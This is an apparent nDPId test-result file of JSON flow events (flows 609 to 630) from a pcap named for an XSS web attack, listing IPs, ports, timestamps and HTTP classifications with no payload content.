-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":609,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348007599,"flow_last_seen":1499348012904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34994,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":609,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348007599,"flow_last_seen":1499348012904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34994,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":610,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348010145,"flow_last_seen":1499348015905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35020,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":610,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348010145,"flow_last_seen":1499348015905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35020,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":611,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348011433,"flow_last_seen":1499348016905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35034,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":611,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348011433,"flow_last_seen":1499348016905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35034,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":612,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348012728,"flow_last_seen":1499348017905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35048,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":612,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348012728,"flow_last_seen":1499348017905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35048,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":613,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348015250,"flow_last_seen":1499348020905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35074,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":613,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348015250,"flow_last_seen":1499348020905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35074,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":614,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348016526,"flow_last_seen":1499348021905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35088,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":614,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348016526,"flow_last_seen":1499348021905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35088,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":615,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348019059,"flow_last_seen":1499348024906,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35114,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":615,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348019059,"flow_last_seen":1499348024906,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35114,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":616,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348020357,"flow_last_seen":1499348025907,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35128,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":616,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348020357,"flow_last_seen":1499348025907,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35128,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":617,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348021660,"flow_last_seen":1499348026908,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35142,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":617,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348021660,"flow_last_seen":1499348026908,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35142,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":618,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348024206,"flow_last_seen":1499348029909,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35168,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":618,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348024206,"flow_last_seen":1499348029909,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35168,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":619,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348025497,"flow_last_seen":1499348030909,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35182,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":619,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348025497,"flow_last_seen":1499348030909,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35182,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":620,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499348028117,"flow_last_seen":1499348033910,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35208,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":620,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499348028117,"flow_last_seen":1499348033910,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35208,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":621,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348029395,"flow_last_seen":1499348034910,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35222,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":621,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348029395,"flow_last_seen":1499348034910,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35222,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":622,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348030687,"flow_last_seen":1499348035910,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35236,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":622,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348030687,"flow_last_seen":1499348035910,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35236,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":623,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499348033296,"flow_last_seen":1499348038910,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35262,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":623,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499348033296,"flow_last_seen":1499348038910,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35262,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":624,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348034569,"flow_last_seen":1499348039911,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35276,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":624,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348034569,"flow_last_seen":1499348039911,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35276,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":625,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348037175,"flow_last_seen":1499348042911,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35302,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":625,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348037175,"flow_last_seen":1499348042911,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35302,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":626,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348038438,"flow_last_seen":1499348043911,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35316,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":626,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348038438,"flow_last_seen":1499348043911,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35316,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":627,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348041088,"flow_last_seen":1499348046912,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35342,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":627,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348041088,"flow_last_seen":1499348046912,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35342,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":628,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348042384,"flow_last_seen":1499348047912,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35356,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":628,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348042384,"flow_last_seen":1499348047912,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35356,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":629,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348043670,"flow_last_seen":1499348048912,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35370,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":629,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348043670,"flow_last_seen":1499348048912,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35370,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":630,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348046262,"flow_last_seen":1499348051913,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35396,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9374,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":630,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499348046262,"flow_last_seen":1499348051913,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348099366,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35396,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 